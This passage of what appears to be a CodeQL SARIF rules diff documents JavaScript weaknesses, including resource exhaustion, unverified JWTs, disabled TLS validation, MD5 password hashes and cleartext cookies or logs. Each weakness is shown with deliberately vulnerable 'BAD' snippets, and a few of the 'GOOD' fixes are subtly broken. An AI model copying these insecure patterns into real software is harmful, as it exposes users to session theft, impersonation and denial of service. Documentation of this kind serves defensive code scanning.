Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. 
A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-400", "external/cwe/cwe-770" ], + "description" : "Allocating objects or timers with user-controlled\n sizes or durations can cause resource exhaustion.", + "id" : "js/resource-exhaustion", + "kind" : "path-problem", + "name" : "Resource exhaustion", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/client-exposed-cookie", + "name" : "js/client-exposed-cookie", + "shortDescription" : { + "text" : "Sensitive server cookie exposed to the client" + }, + "fullDescription" : { + "text" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n", + "markdown" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1004" ], + "description" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.", + "id" : "js/client-exposed-cookie", + "kind" : "problem", + "name" : "Sensitive server cookie exposed to the client", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/disabling-certificate-validation", + "name" : "js/disabling-certificate-validation", + "shortDescription" : { + "text" : "Disabling certificate validation" + }, + "fullDescription" : { + "text" : "Disabling cryptographic certificate validation can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. 
But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n", + "markdown" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. 
But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-295", "external/cwe/cwe-297" ], + "description" : "Disabling cryptographic certificate validation can cause security vulnerabilities.", + "id" : "js/disabling-certificate-validation", + "kind" : "problem", + "name" : "Disabling certificate validation", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/jwt-missing-verification", + "name" : "js/jwt-missing-verification", + "shortDescription" : { + "text" : "JWT 
missing secret or public key verification" + }, + "fullDescription" : { + "text" : "The application does not verify the JWT payload with a cryptographic secret or public key." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n", + "markdown" : "# JWT missing secret or public key verification\nApplications decoding 
JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-347" ], + "description" : "The application does not verify the JWT payload with a cryptographic secret or public key.", + "id" : "js/jwt-missing-verification", + "kind" : "problem", + "name" : "JWT missing secret or public key verification", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : 
"js/insufficient-password-hash", + "name" : "js/insufficient-password-hash", + "shortDescription" : { + "text" : "Use of password hash with insufficient computational effort" + }, + "fullDescription" : { + "text" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. 
A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n", + "markdown" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. 
A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-916" ], + "description" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.", + "id" : "js/insufficient-password-hash", + "kind" : "path-problem", + "name" : "Use of password hash with insufficient computational effort", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "8.1" + } + }, { + "id" : "js/unvalidated-dynamic-method-call", + "name" : "js/unvalidated-dynamic-method-call", + "shortDescription" : { + "text" : "Unvalidated dynamic method call" + }, + "fullDescription" : { + "text" : "Calling a method with a user-controlled name may dispatch to an unexpected target, which could cause an exception." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. 
In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. 
If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n", + "markdown" : "# Unvalidated dynamic method call\nJavaScript 
makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. 
Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) 
{\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-754" ], + "description" : "Calling a method with a user-controlled name may dispatch to\n an unexpected target, which could cause an exception.", + "id" : "js/unvalidated-dynamic-method-call", + "kind" : "path-problem", + "name" : "Unvalidated dynamic method call", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/clear-text-storage-of-sensitive-data", + "name" : "js/clear-text-storage-of-sensitive-data", + "shortDescription" : { + "text" : "Clear text storage of sensitive information" + }, + "fullDescription" : { + "text" : "Sensitive information stored without encryption or hashing can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. 
This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. 
Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = 
req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], + "description" : "Sensitive information stored without encryption or hashing can expose it to an\n attacker.", + "id" : "js/clear-text-storage-of-sensitive-data", + "kind" : "path-problem", + "name" : "Clear text storage of sensitive information", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/clear-text-logging", + "name" : "js/clear-text-logging", + "shortDescription" : { + "text" : "Clear-text logging of sensitive information" + }, + "fullDescription" : { + "text" : "Logging sensitive information without encryption or hashing can expose it to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. 
Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n", + "markdown" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. 
